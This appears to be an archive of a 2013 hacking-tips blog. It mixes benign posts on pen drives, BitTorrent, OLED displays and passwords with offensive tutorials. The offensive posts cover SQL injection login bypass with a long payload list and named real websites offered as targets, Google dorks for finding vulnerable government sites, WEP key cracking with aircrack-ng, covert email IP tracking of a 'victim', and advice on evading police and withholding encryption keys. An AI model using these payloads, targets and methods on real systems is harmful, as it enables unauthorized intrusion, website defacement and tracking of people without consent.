Saturday, 22 June 2013

Pen Drive As RAM



How to Use Pen Drive As RAM


For XP
Insert your pen-drive. Let your PC read it.(Minimum 2 GB)

Right click on My Computer.

Click on Properties from context menu.
Click on Advanced tab.
Click on Settings under Performance.
Click on Advanced tab.
Click on Change button under Virtual memory.
Select your USB drive.
Click on custom size radio button and give the values as follows;
Initial Size:1020
Maximum size:1020
The size depends upon your free memory capacity of your pen drive. So you can change this limit according to your pen drive size.
Click on Set button, then click on OK.
Now you have to restart the computer. The speed of your computer will be increase


For Windows 7

Plug in your pendrive-> Format with NTFS or FAT32
Now go to properties->Select ReadyBoost
Check Use this device->Choose maximum space to reserve system speed
Click on Apply and OK. Your readyboost PenDrive is ready Now to Use.
Here is an personal suggestion HP and Sandisk is the Best for this work so what are you waiting for.

How to Remove Autorun.inf


How to Remove Autorun.inf Virus from Pendrive Easily – Without Antivirus!


I have heard many peoples suffering from autorun.inf virus that is the major problem of the windows xp users
Anyway, As we know Our Antivirus (Basically, Avira, Avast, AVG, etc), Only detects Virus i.e autorun.inf whenever you insert your removable disk (Pen Drives). But our AntiVirus can’t disinfect it nor delete it.

Hmm, the autorun.inf is hidden and it can’t be remove or disinfected by Anti virus.
I have a Funny tutorial for you all through which you all can get Rid from this Virus without any Antivirus:

1. Open Notepad
2. Do not write anything in it.
3. Save as (any where in PC i.e Desktop) with name “autorun.inf”
4. Copy and paste in your “Pen Drives”
5. Remove your drive then insert again, it will open normally

How Torrent Works



Ho
w Torrent Works

BitTorrent
BitTorrent is a protocol that enables fast downloading of large files using minimum Internet bandwidth. It costs nothing to use and includes no spyware or pop-up advertising.

Unlike other download methods, BitTorrent maximizes transfer speed by gathering pieces of the file you want and downloading these pieces simultaneously from people who already have them. This process makes popular and very large files, such as videos and television programs, download much faster than is possible with other protocols.


BitTorrent Speak
Like most Internet phenomena, BitTorrent has its own jargon. Some of the more common terms related to BitTorrent include:

* Leeches - People who download files but do not share files on their own computer with others

* Seed or seeder - A computer with a complete copy of a BitTorrent file (At least one seed computer is necessary for a BitTorrent download to operate.)

* Swarm - A group of computers simultaneously sending (uploading) or receiving (downloading) the same file

* .torrent - A pointer file that directs your computer to the file you want to download

* Tracker - A server that manages the BitTorrent file-transfer process

Here's how it works:

BitTorrent's peer-to-peer download process

* You open a Web page and click on a link for the file you want.

* BitTorrent client software communicates with a tracker to find other computers running BitTorrent that have the complete file (seed computers) and those with a portion of the file (peers that are usually in the process of downloading the file).

* The tracker identifies the swarm, which is the connected computers that have all of or a portion of the file and are in the process of sending or receiving it.

* The tracker helps the client software trade pieces of the file you want with other computers in the swarm. Your computer receives multiple pieces of the file simultaneously.

* If you continue to run the BitTorrent client software after your download is complete, others can receive .torrent files from your computer; your future download rates improve because you are ranked higher in the "tit-for-tat" system.

Downloading pieces of the file at the same time helps solve a common problem with other peer-to-peer download methods: Peers upload at a much slower rate than they download. By downloading multiple pieces at the same time, the overall speed is greatly improved. The more computers involved in the swarm, the faster the file transfer occurs because there are more sources of each piece of the file. For this reason, BitTorrent is especially useful for large, popular files.- See more at:

Stay Anonymous using TOR



Hey guys.

In the past, there have been a few hacks that could be traced back by the police, because the hackers used VPN's.

The VPN providers gave the US goverment because of the patriot act all the information they wanted, so they can not really guarantee you to stay 100% Anonymous.

So as an alternative for VPNs to stay hidden, you can use TOR.

In this Tutorial, I will deal on how to do that.
The tutorial is seperated into these parts:

What is TOR and how does it work?
How do I Download and Install TOR?
How do I use TOR?





What is TOR and how does it work?
====================
TOR (The Onion Router)
is a network, that tunnels your traffic through a worldwide volunteer network of PC's.

That means, when you want to connect to a website using TOR, you wont connect directly, but you will connect first to another PC, which also connects to another PC etc.
This will happen a few times, while the connections are ecrypted.
after that, the last PC, the exitnode, will connect to the page you requested.

The server you connected to will only see the last one's IP address, so you stay hidden.

here is a small graphic:







How do I Download and Install TOR? 
=============================================
TOR can be downloaded here:
https://www.torproject.org/download/download

There you can Download the "Tor Browser Bundle"
Just pick your Language and OS.

When the Download has finished,
Just extract the date somewhere, using 7zip or winzip or whatever.

now, when done, just click the "start tor browser" application.
Yes! there is no Insstallation needed! great huh?

The Tor browser is basically a Firefox in a modified Aurora version.



=============================================

How do I use TOR? 
=============================================
Basically you can use TOR just as any other Web browser.
what I often do, is having one TOR and one usual Browser up, so for misc stuff i use tor and for things that need to be done quick i just use my normal firefox.

when you use TOR you will have to follow some rules, to stay hidden.


Want Tor to really work?

You need to change some of your habits, as some things won't work exactly as you are used to.
Use the Tor Browser

Tor does not protect all of your computer's Internet traffic when you run it. Tor only protects your applications that are properly configured to send their Internet traffic through Tor. To avoid problems with Tor configuration, we strongly recommend you use the Tor Browser Bundle. It is pre-configured to protect your privacy and anonymity on the web as long as you're browsing with the Tor Browser itself. Almost any other web browser configuration is likely to be unsafe to use with Tor.
Don't enable or install browser plugins

The Tor Browser will block browser plugins such as Flash, RealPlayer, Quicktime, and others: they can be manipulated into revealing your IP address. Similarly, we do not recommend installing additional addons or plugins into the Tor Browser, as these may bypass Tor or otherwise harm your anonymity and privacy. The lack of plugins means that Youtube videos are blocked by default, but Youtube does provide an experimental opt-in feature (enable it here) that works for some videos.
Use HTTPS versions of websites

Tor will encrypt your traffic to and within the Tor network, but the encryption of your traffic to the final destination website depends upon on that website. To help ensure private encryption to websites, the Tor Browser Bundle includes HTTPS Everywhere to force the use of HTTPS encryption with major websites that support it. However, you should still watch the browser URL bar to ensure that websites you provide sensitive information to display a blue or green URL bar button, include https:// in the URL, and display the proper expected name for the website.
Don't open documents downloaded through Tor while online

The Tor Browser will warn you before automatically opening documents that are handled by external applications. DO NOT IGNORE THIS WARNING. You should be very careful when downloading documents via Tor (especially DOC and PDF files) as these documents can contain Internet resources that will be downloaded outside of Tor by the application that opens them. This will reveal your non-Tor IP address. If you must work with DOC and/or PDF files, we strongly recommend either using a disconnected computer, downloading the free VirtualBox and using it with a virtual machine image with networking disabled, or using Tails. Under no circumstances is it safe to use BitTorrent and Tor together, however.
Use bridges and/or find company

Tor tries to prevent attackers from learning what destination websites you connect to. However, by default, it does not prevent somebody watching your Internet traffic from learning that you're using Tor. If this matters to you, you can reduce this risk by configuring Tor to use a Tor bridge relay rather than connecting directly to the public Tor network. Ultimately the best protection is a social approach: the more Tor users there are near you and the more diverse their interests, the less dangerous it will be that you are one of them. Convince other people to use Tor, too!

That's it.
have fun with TOR, and stay hidden!

====================

Thank you for reading!
please leave a comment


Tuesday, 11 June 2013

Bypassing Login pages on websites using SQL injectable queries

sql injection in 5 chapters

chapter 2 

Level: Beginners and Intermediate

Requirements: Patience and stradegy

Alright in this tutorial, we'll be learning how to bypass login pages with the help of MySequel injection using Login Queries.

Please visit Chapter 1 if you haven't seen it yet: 
http://htu-2.blogspot.com/2013/06/dork-for-sql-injection.html



What is SQL injection?

Answer: Basically, it's a process where you execute a certain query in a website in order to extract information such as log-in information, users etc. for either personal gain or random use from the website's database.
There are many type of certain queries that can be executed in order to illegally extract information from the website's database.
In this tutorial the query we'll be using is Basic SQL injection query where it can be executed in a login page.
Example:

==============================================

Username: admin
Password: ‘ or ‘1’=’1

==============================================
When you enter the password "‘or ‘1’=’1" in most website, there's a chance you can gain access.
How does it happen? Look at the code when we execute that query

==============================================

SELECT * FROM users
WHERE username = ‘admin’
AND password = ‘ ‘ or ‘1’=’1’

==============================================

In the password field, we inserted a quote ' first, then a bunch of random characters like "1".
The database always scans for rows and hence in the query we have executed, there's only 1 row which states that there's no reason for the login to be incorrect.
However, some websites can filter out these type of queries, so it's best to use different ones too. You can find some below
Now that you have an idea of how Basic SQL injection queries work, lets try and put it to use shall we


Step1: Finding websites with Login Pages

Alright, out basic approach is to find a couple
 of websites with login pages so that we can execute our query in order to bypass it.
For this, we can use dorks.
If you don't know how to use dorks or have no idea about it, please visit my previous tutorial: 

In this tutorial, we can use these dorks:

==============================================

Code:

inurl:/login.php
inurl:/admin.php
inurl:/admin
inurl:/login.html

==============================================


Step2: Now Executing the query
Alright, now that you've found your target with a log in page, lets play with it a bit.
So here's what you're gonna do
Username will be admin, cause most sites are having admin data stored in their databases


===============================================
Code:

Username: admin
Password: ' or 0=0 --

===============================================
Didn't work? No worries, there's more to that than just a single query
Here's a list of queried passwords you can use to hopefully inject the site.

==================================================
Code:

' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'

==================================================
=
Note: Sometimes, this is not the best way of hacking websites with SQL injection but I guarantee, you'll be a successful patient SQL injector and get used to this method.


Step3: I LOGGED in, what to do now?!
Well, first off, if you did login, then congratz on your first successful attempt of SQL injection.
So, there are basically many things you can do with the site.
Most people would love to deface it
Others will just shell it and have other uses such as rooting, webhosting etc.
If would like to deface the website, locate the homepage and replace it with your deface page.
A tutorial of mine on how to deface a page will be coming soon
Now you might wanna watch the video so that you'll get the idea of how I login as an Administrator on a SQLi vulnerable website







Extras:
Common Password Queries:

===============================================

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

===============================================
Here are some sites you can test on:


Code:

http://www.amskrupajal.org/AdminLogin.asp
http://www.csimatrichss.org/adminpage.asp
http://www.preventivecardiology.in/adminlogin.asp
http://pndllc.com/pndllc/admin/adminlogin.asp
http://www.singleusemedical.com/admin/adminLogin.asp
http://www.ringjordan.com/admin.asp
http://sunmarytrust.org/adminlogin.aspI tried injecting all of them and it worked, so it should work for you too

Dork for sql injection


sql injection in 5 chapters


#Chapter1: Knowing How to Use/Create Dorks#


For Beginners

A method of finding websites vulnerable to SQL injection is using what we call "dorks"

Dorks:They are like search criteria in which a search engine returns results related to your dork.
The process can be a little time consuming, but the outcome will be worth it after learning on how to use dorks


For this tutorial, the search engine we'll be using is Google



Step1: Finding your dorks i.e. the criteria you'll be using

For this tutorial, we'll be using this dork "inurl:index.php?id="


Step2: Making use of your Dorks with the help of Google


Here's what you do:
Go to http://www.google.com
Type the dork in the search bar "inurl:index.php?id=" (with or without quotes)
Now you'll find a whole lot of links in your results



Here's how you can speed up your process:

In your mouse, there should be a scroll button right?

Hover your mouse on each link and hit the scroll button so that it'll open on a new tab. (Lets say you can open about 10 links at a time)

Step3: Vulnerability approach


Now to see whether the website is vulnerable to SQL injection or not, we simply put in a quote " ' " at the end of the url address.

So our site will look like this


Code:


http://www.site.com/index.php?id=123'




Do the same thing with the websites you opened on your tabs and see if there's any vulnerable website.



To determine if a website is vulnerable or not, it should return an error!



Note: If you can't find any vulnerability after doing some vulnerability search on this dork, you can always browse the dork list I've mentioned above and use any of them until you find any website vulnerable to SQL injection



Extra Notes: Hunting for specific websites with specific domains

Ever want to hack a government website, or an organization website?

It's simple. All you have to do is improvise your dorks.

First off, here are some common domains

.gov = Government websites

.edu = Educational websites

.org = Organizational websites

.com = Commercial websites

.info = Informative websites

.net = Networking websites ( similar to .com)

Alright now you know some specific domains, lets add them to our dork shall we?

Follow this formula-like dork


Code:


"inurl:."domain"/"dorks" "

So you would normally understand it like this:

"inurl" = input URL

"domain" = your desired domain ex. .gov

"dorks" = your dork of your choice

Now for an example, lets say you want to hack government websites

Here's how it'll look

"inurl:.gov/index.php?id="

Once you search that up, you'll find a lot of government websites on your results




Changing "inurl" and using another one

Yes, you can change that too.

Google has a lot of functions you can come up with

Some of them are below where you can change "inurl" and make another dork

=======================================================================

intitle:
intext:
define:
site:
info:
link:
=======================================================================


Choose any of the and make another.

Example: "intext:.edu/gallery?id="


End of Chapter 1

wifi hacking

WEP CRACKING ON BACKTRACK 5





AIM


This tutorial aim is to guide you the process of WEP CRACKING On Backtrack 5 .



Should have a knowledge of these terms -

AP : stands for Access Point or a wireless router .
MAC Address : stands for ;Media Access Control ,its a unique address , It is in the Hexadecimal format like 00:6B:6B:2F:C8:C8 .
BSSID : It is the AP Mac Address.
ESSID : It shows the AP broadcasting name .
WEP : stands for Wired Equivalency Protocol .
WEP is a security protocol for Wifi (Wireless fidility) Networks.


Tools used to Crack WEP are -
iwconfig : A tool that for configure wireless adapter
macchanger : A tool that allow you to spoof your Mac Address.
airmon - a tool that set your wireless adapter into monitor mode .
airodump - a tool that capture packet from the wireless router.
aireplay - a tool for forging ARP request.
aircrack - a tool for decrypting WEP keys .
Requirements

Backtrack 5 distro.
Wireless Adapter Card
Lets start the Procedure -


Step 1 : Open a new konsole on Backtrack 5


See the image how to open konsole on Backtrack 5 .





Step 2 : Type the command shown below -

Command 1: ifconfig wlan0
Command 2: iwconfig wlan0
See the image below for more details -



Step 3: Put your Wifi adapter card on Monitor Mode

Open a new konsole and enter the command shown below -
Type the following command to put your card into Monitor mode .
Command : airmon-ng start (your interface)
Example : airmon-ng start wlan0
A message is also display on the screen that your monitor mode is enabled.
See the image for more details -






Step 4: Display the monitor mode .

New monitor mode created named mon0
To see the monitor mode enter the command shown below -
Command : iwconfig
See the image for more details -




Step 5: Finding a Target

Now we have to find the network that is protected by the WEP .
To find those networks we use a simple command shown below -
Command : airodump-ng mon0
Here airodump-ng is the command to start the program
mon0 is the new interface which you created in the earlier step .
See the image below for more details -





Step 6: Capture the data into file

To capture the data we use airodump tool with additional switches like --bssid ( mac address), -c (channel), -w (filename )
Syntax of the commands is -
Command : airodump-ng mon0 --bssid (Mac Address) -c (channel no.) -w (filename)
Example : airodump-ng mon0 --bssid 00:08:68:2F:C8:C8 -c 1 -w WEPkey
See the image below for more details -



Step 7: Open Home Directory to check WEPkey file is created or not .

Open the Home Directory .
Check your WEPkey file is created or not .
See the image below - Image shows WEPkey file is created and saved in the home directory.




Step 8: Crack the WEP Key using Aircrack Tool

Open a new konsole .
Then enter the command : aircrack-ng (file name)
Example : aircrack-ng WEPkey-01.cap
Withing a minute aircrack will decrypt your WEP key as shown in the image .
See the image below



This is how we can WEP CRACKING on Backtrack 5 .
If you like this article , then drop a comment .
I hope you like this article on WEP CRACKING on Backtrack 5

Monday, 10 June 2013

anonymous tutorial

Hide like a hacker


i- Protection
ii- Encryption
iii- Anonymity
iv- Links


Protection



Basically what I am trying to say in this section is, before you go out hacking other people and other things, just check for a second and make sure it's not as easy to hack your device. There are some pretty simple steps for this though.

Make sure all your security updates are installed, if you have windows firewall disable it.
Download your own firewall. If you are behind a router you can skip this.
Make sure all unused ports are closed.
Check your msconfig, run a few HJT logs and Malwarebyte's to make sure you are not already infected.
Use a keyscambler to prevent keyloggers



It is important that you are not infected because other could see you hacking and steal it from you or alternitively, if they get caught, you get caught. On the other hand you might want to stay infected by a bot or RAT so if and when you are caught you can claim you had no knowledge and the bot controlled your PC and performed the hack without your knowledge. However I am not someone who intends to be caught. (I'm not really a black hat either)

I don't personally use an AV for many reasons reasons:
It is possible to make an FUD virus, this is likely to be what you get infected with.
It often goes around deleting your stuff without asking.
They slow down your PC and often hog the CPU.
Whilst performing updates it slows down your connection.FireWall: (not tested)
http://personalfirewall.comodo.com

KeyScrambler:
http://www.qfxsoftware.com

HJT:
http://download.cnet.com/Trend-Micro-Hij...27353.html

Malewarebytes:
http://www.malwarebytes.org

Another way to prvent this is to use a Lixux-based O/S as altohugh these aren't 100% secure they have a lot on Windows machines due to the fact they are less common.

But remember you are not invisible: 
========================================================================

If you downloaded and installed the open-source Unreal IRC server in the last 8 months or so, you’ve been pwned.

"Hi all,

This is very embarrassing…

We found out that the Unreal3.2.8.1.tar.gz file on our mirrors has been replaced quite a while ago with a version with a backdoor (trojan) in it.

This backdoor allows a person to execute ANY command with the privileges of the user running the ircd. The backdoor can be executed regardless of any user restrictions (so even if you have passworded server or hub that doesn’t allow any user).

========================================================================

Encryption
Be under no ilussions, this is one of the most important steps to keeping information secret. Now I am a big fan of encryption and here is why:

========================================================================

"if your encryption program uses 128-bit keys, your particular key could be any of more than 3.4 trillion billion billion billion possible combinations. More likely to win the lottery than to crack that level of encryption using the brute-force method"[b]Or just use RSA 4096-bit and 256-bit AES?

========================================================================

Now I think this says a little bit about how much safer encryption makes you, if you encrypt your HDD using 256-bit, there is little chance even the authorities will crack it.... in your lifetime. However do be aware of local law for example in the UK the new Regulation of Investigatory Powers Act states:

========================================================================


Individuals who are believed to have the cryptographic keys necessary for such decryption will face up to 5 years in prison for failing to comply with police or military orders to hand over either the cryptographic keys, or the data in a decrypted form


========================================================================


The penelties are up to 5 years for terrorism-related inforamtion and 2 years for "All other failures to comply"

Therefore depending on the strength of your offence it could be more wise to with-hold your key on claims of a privacy breach, and face the maximum two years than to hand over your keys.

The program I most recomend for doing this is

TrueCrypt:
http://www.truecrypt.org

True crypt can provdie 256-bit encryption

========================================================================

The design and strength of all key lengths of the AES algorithm (i.e., 128, 192 and 256) are sufficient to protect classified information up to the SECRET level. TOP SECRET information will require use of either the 192 or 256 key lengths.




Code:Oh and that's not even the most useful part:
TrueCrypt allows you to create a hidden operating system whose existence will be impossible to prove (provided that certain guidelines are followed — see below). Thus, you will not have to decrypt or reveal the password for the hidden operating system.

========================================================================
As there is a pre-boot authentication process which asks for your encryption password you can have two, one for people to see and one for hacking purposes. This is IMPOSSIBLE to prove so I highly recommed using it, although I don't use it myself...

Anonymity


Now, this is THE MOST IMPORTANT section of the whole tutorial, get this part right and you can pretty much forget about the rest (however if you are performing something illegal following the other steps might help you sleep better).

Hidding your IP and identity is crucial. Here is my prefred methods:

SOCKS5 Proxy
L1 HTTPS Proxy
GCI proxy
Encrypted VPN (no logs)



Diference between SOCKS and HTTP





========================================================================

SOCKS

Bill wishes to communicate with Jane over the internet, but a firewall exists on his network between them and Bill is not authorized to communicate through it himself. Therefore, he connects to the SOCKS proxy on his network and sends to it information about the connection he wishes to make to Jane. The SOCKS proxy opens a connection through the firewall and facilitates the communication between Bill and Jane. For more information on the technical specifics of the SOCKS protocol, see the sections below.
HTTP

Bill wishes to download a web page from Jane, who runs a web server. Bill cannot directly connect to Jane's server, as a firewall has been put in place on his network. In order to communicate with the server, Bill connects to his network's HTTP proxy. His internet browser communicates with the proxy in exactly the same way it would the target server—it sends a standard HTTP request header. The HTTP proxy reads the request and looks for the Host header. It then connects to the server specified in the header and transmits any data the server replies with back to Bill.


========================================================================

Remember:


========================================================================

HTTP proxies are traditionally more HTTP protocol aware and do more high level filtering (even though that usually only applies to GET and POST methods, not CONNECT). SOCKS proxies can also forward UDP traffic and work in reverse - HTTP proxies can't do that.

========================================================================

Due to the restrictions of a HTTP proxy, they ONLY work for HTTP traffic and do not support UDP and other types of proxy uses. the reason is because they "infer the address of the server and therefore may only be used for HTTP traffic".

Use both HTTP and SOCKS if possible though this is known as "Proxy Chaining" this is used to make your actions harder to trace but its not truely effective.

REMEBER: Do not use an L3 HTTP proxy as they show your true IP in the header and are therefore essentially pointless.
VPN

This is by far the most effective way to conceal your identity. It channels you traffic and encrpts it with 128-bit. Although some support 256-bit. Often a VPN is much more reliable and does not slow down your connection as much (in fact I haven't noticed mine at all)

A VPN is a virtual Private Network


========================================================================

"Secure VPNs use cryptographic tunneling protocols to provide confidentiality by blocking intercepts and packet sniffing, allow sender authentication to block identity spoofing, and provide message integrity by preventing message alteration."

========================================================================

The best VPN's are paid I used to have a link to a free VPN but that is dead now. I will edit this if I find a link again.

A decent PAID VPN is: HMA

But always use this in conjunction with something else if you are breaking something...

ProxyFirewall is a good program which runs SOCKS and HTTP proxies

[http://uniqueinternetservices.com/proxy-firewall-download.html

Bibliography:

UK law report:
http://arstechnica.com/tech-policy/news/...l-time.ars

Regulation of Investigatory Powers Act:
http://www.opsi.gov.uk/acts/acts2000/ukpga_20023_en_8

Goverment stance on AES:
http://csrc.nist.gov/groups/STM/cmvp/doc...SS15FS.pdf

Wikipedia review on AES:
http://en.wikipedia.org/wiki/Advanced_En...d#Security

TrueCrypt Hidden o/s:
http://www.truecrypt.org/docs/?s=hidden-...ing-system

SOCKS Information and example:
http://en.wikipedia.org/wiki/SOCKS

Proxy Chaining:
http://www.freeproxy.ru/en/free_proxy/fa...aining.htm

Linux infection news:
http://www.zdnet.com/blog/bott/linux-inf...dated/2206

Official IRCd announcement:
http://forums.unrealircd.com/viewtopic.php?t=6562

Downloads linked:

Proxy firewall:
http://uniqueinternetservices.com/proxy-...nload.html

TrueCrypt:
http://www.truecrypt.org/downloads

UltraVPN:
https://www.ultravpn.fr/download.htm

FireWall: (not tested)
http://personalfirewall.comodo.com

KeyScrambler:
http://www.qfxsoftware.com

HJT:
http://download.cnet.com/Trend-Micro-Hij...27353.html

Malewarebytes:
http://www.malwarebytes.org

secure your password

What is a password?
A password is a secret word or string of characters that is used for authentication, to prove identity or gain access to a resource (example: an access code is a type of password). The password should be kept secret from those who are not allowed access.

Why should I choose a secure password?



A password is the key of your cyber properties. It's the only key to access your accounts of various websites. That is why it should be kept secure, otherwise anybody can access to your resources and may abuse them. That is why it is very important to chose a secure password.

Creating a strong & unique password helps stop someone from accessing into you accounts & keep it safer.


How do you choose a secure password?:



Choosing the right password is very important, but it is something that many people find difficult to chose. The simple tips below are intended to assist you in choosing a good password.


Things to look at:
Length: Make your passwords long, with eight or more characters.
Complexity Include letters, punctuation, symbols, and numbers. Use the entire keyboard, not just the letters and characters you use or see most often. The greater the variety of characters in your password, the better. However, password hacking software automatically checks for common letter-to-symbol conversions, such as changing "and" to "&" or "to" to "2."
Variation To keep strong passwords effective, change them often. Set an automatic reminder for yourself to change your passwords on your email, banking, and credit card websites about every three months.
Variety Don't use the same password for everything. Cybercriminals steal passwords on websites that have very little security, and then they use that same password and user name in more secure environments, such as banking websites.




Password Tips:

Password will be something, which you'll always remember: You must not forget your password. Before choosing a password, make sure that you will always remember it.
Password should contain at least 8 characters. The longer, the better: A good password should be at least of 8 characters. But a longer password is much difficult for attackers to guess or crack.
Password should contain Uppercase, Lowercase & at least 1 number.(also spaces): You password should contain Uppercase(ex: A, B, C), Lowercase(ex: a, b, c) & at least 1 number, also some spaces. This make you much safer from all those Brutus forces.
Include punctuation marks: Using punctuation marks in your password, makes it more stronger.
Include phonetic replacements, such as 'Luv 2 Laf' for 'Love to Laugh.'
Chose a password that You can type very quickly, so someone else cannot look over your shoulder: Someone may be watching your fingers while you type your password. Chose a password which you can type quickly, so that they can not understand what you're typing.
Use Special characters & alt characters: Such as: @, $, µ, £, Æ
Chose a password which is IMPOSSIBLE to guess. Find a good way to remember it. (Remember: easy to remember is often the opposite of hard to guess!)
Try to chose a "nonsense words." : Chose a password which makes no sense at all. This is a great way to prevent others from guessing your password.
Change your passwords frequently (every 3 months or so) and when you change your password, don’t choose a new one that is similar to the old one.



Things to avoid:
Keep the passwords a SECRET: Password is secret. So keep it that way.
Password should not be related to you or your life.(age, school, name, birthday etc.): Password should not be related to you personal life.
Never write you password anywhere(Someone might find it), Memorize & remember it.
Using a dictionary word as password in not a good idea.
Do NOT chose a password, which you are already using with other accounts elsewhere.
DO not use a password generator to chose your password: Someone else may know that you use a generated password from a password generator & they might find the password out...
Password should NEVER be as same as your username.
Password should never be these:
Your Name
Spouse's name
Child's name
Pet's Name
Your Phone Number
Your Birthday date
A Relative's Birth date
Your social security number
Driver's license number
Passport number

Friday, 7 June 2013

track IP address







Today also i am going to explain you advanced method. By using method you can get the IP address,location, timing of victim.


How to track IP address?

step 1:


know what is your victim email id.
For eg:
victimid[@]gmail.com

step 2:
Register an account here: http://www.readnotify.com

step 3:
send mail to victim using your readnotify.com mail account. Before sending mail append ".readnotify.com" at end of victim mail ID.
For eg:
victimid[@]gmail.com.readnotify.com


step 4:
if victim opens the mail, his info will be tracked(IP address) and mailed to your account.



IP Masking



What is IP Masking? How to use Fake IP address?


What is Ip Masking?
IP masking is hiding your Original(Dynamic/Static) IP address so that you can not be traced. IP masking is using Fake IP address for your machine.


For Example, Let us assume your ip address is 173.23.22.212 and your location is xxxx.

Using IP masking, you can make your IP address is 202.102.12.123(fake IP Address) and your location becomes yyyy.

Using Proxy IP Address , you can hide your IP. Read this article : What is Proxy IP Address?

This can be achieved by the following methods:

Set Proxy IP Address in your Browser
Use IP hiding Tools
Web proxy(Eg: Flyproxy)


So won't i be traced now? The Answer is yes and No. It is depending on your anonymity level of your Proxy IP address.

Different Types of Anonymity Levels:
Transparent Proxy


This type of proxy server identifies itself as a proxy server and also makes the original IP address available through the http headers. These are generally used for their ability to cache websites and do not effectively provide any anonymity to those who use them. However, the use of a transparent proxy will get you around simple IP bans. They are transparent in the terms that your IP address is exposed, not transparent in the terms that you do not know that you are using it (your system is not specifically configured to use it.)

Anonymous Proxy
This type of proxy server indentifies itself as a proxy server, but does not make the original IP address available. This type of proxy server is detectable, but provides reasonable anonymity for most users.

Distorting Proxy
This type of proxy server identifies itself as a proxy server, but make an incorrect original IP address available through the http headers.

High Anonymity Proxy
This type of proxy server does not identify itself as a proxy server and does not make available the original IP address.

facebook password hack

Three passwords to Access your Facebook account



Facebook allows the following variation of your passwords:

1. Your Original Password:

Let us assume that you are using "breakTheSecurity" as password. Yeah, you can log in with your default password ;)

2. Your original password with the case reversed(Toggle case):

This one will be interesting one. You can toggle the case of your Password and use it.

For instance, your are using "breakTheSecurity" as your default password. In this password, 'T' and 'S' is Capitalized.

if you toggle the password case, then your password will become "BREAKtHEsECURITY".

3. Your original password with the first letter capitalized:

If the first character of your password is in lower case and you change it to Upper case, you can still login with this one.

For instance, the original password is "breakTheSecurity" . In this password, the first character 'b' is in lower case. If you capitalize the first character, then your password is "BreakTheSecurity".


The reason for 3 Passswords for your facebook account

It is not security flaw. It is just feature provided by Facebook.

"We accept three forms of the user's password to help overcome the most common reasons that authentic logins are rejected. In addition to the original password" Zdnet quoted as Facebook spokesperson saying. " we also accept the password if a user inadvertently has caps lock enabledor their mobile device automatically capitalizes the first character of the password."

Three different Usernames:
1. You can use your Facebook 'Username' as user name(if you have created)
2. You can use your email address
3. You can use use your mobile number ( if you have added your mobile number in Fb).

computer hacking



What is computer hacking?


In a cyber security world, the person who is able to discover weakness in a system and managed to exploit it to accomplish his goal referred as a Hacker , and the process is referred as Hacking.

Now a days, People started think that hacking is only hijacking Facebook accounts or defacing websites. Yes, it is also part of hacking field but it doesn't mean that it is the main part of hacking.

So what is exactly hacking, what should i do to become a hacker?! Don't worry, you will learn it from Break The Security. The main thing you need to become a hacker is self-interest. You should always ready to learn something and learn to create something new.


Now , let me explain about different kind of hackers in the cyber security world.


Script Kiddie

Script Kiddies are the persons who use tools , scripts, methods and programs created by real hackers. In a simple word, the one who doesn't know how a system works but still able to exploit it with previously available tools.

White Hat Hacker:
White Hat hackers are good guys who does the hacking for defensing. The main aim of a Whitehat hacker is to improve the security of a system by finding security flaws and fixing it. They work for an organization or individually to make the cyber space more secure.

Break The Security only concentrates on white-hat hacking and help you to learn the Ethical Hacking world.

Black Hat Hacker:
BlackHat hackers are bad guys , cyber criminals , who have malicious intent. The hackers who steal money, infect systems with malware ,etc are referred as BlackHat hackers. They use their hacking skills for illegal purposes.


GreyHat hackers:

The hackers who may work offensively or defensively, depending on the situation. Hackers who don't have malicious intentions but still like to break into third-party system for fun or just for showing the existence of vulnerability.

Hacktivists

The hackers who use their hacking skills for protesting against injustice and attack a target system and websites to bring the justice. One of the popular hacktivists is Anonymous.


Saturday, 1 June 2013

OLED





An OLED (organic light-emitting diode) is a light emitting diode (LED) in which the emissive electroluminescent layer is a film of organic compoud which emits light in response to an electric current. This layer of organic semiconductor material is situated between two electrodes. Generally, at least one of these electrodes is transparent. OLEDs are used to create digital display in devices such as television screens, computer monitors, portable systems such as mobile phones, handled game console and PDAs.



An OLED display works without a back light. Thus, it can display deep black levels and can be thinner and lighter than a liquid crystal display (LCD). In low ambient light conditions such as a dark room an OLED screen can achieve a higher contrast ratio than an LCD, whether the LCD uses cold cathode lamps or LED backlight. Due to its low thermal , an OLED typically emits less light per area than an inorganic LED.

WORKING PRINCIPLE

A typical OLED is composed of a layer of organic materials situated between two electrodes, the anode and cathode, all deposited on a substrate. The organic molecules are electrically conductive as a result of delocalization of pi electrons caused by conjugation over all or part of the molecule. These materials have conductivity levels ranging from insulators to conductors, and therefore are considered organic semiconductors. The highest occupied and lowest unoccupied molecular orbitals (HOMO and LOMO) of organic semiconductors are analogous to the valence and conduction bands of inorganic semiconductors.

Originally, the most basic polymer OLEDs consisted of a single organic layer. One example was the first light-emitting device synthesised by J. H. Burroughes et al., which involved a single layer of poly(p-phenylene vinylene). However multilayer OLEDs can be fabricated with two or more layers in order to improve device efficiency. As well as conductive properties, different materials may be chosen to aid charge injection at electrodes by providing a more gradual electronic profile, or block a charge from reaching the opposite electrode and being wasted. Many modern OLEDs incorporate a simple bilayer structure, consisting of a conductive layer and an e missive layer. More recent developments in OLED architecture improves quantum efficiency (up to 19%) by using a graded hetero junction. In the graded heterojunction architecture, the composition of hole and electron-transport materials varies continuously within the emissive layer with a dopant emitter. The graded heterojunction architecture combines the benefits of both conventional architectures by improving charge injection while simultaneously balancing charge transport within the emissive region.

Portable Pen Projector





put the projector in pocket? Then see this…

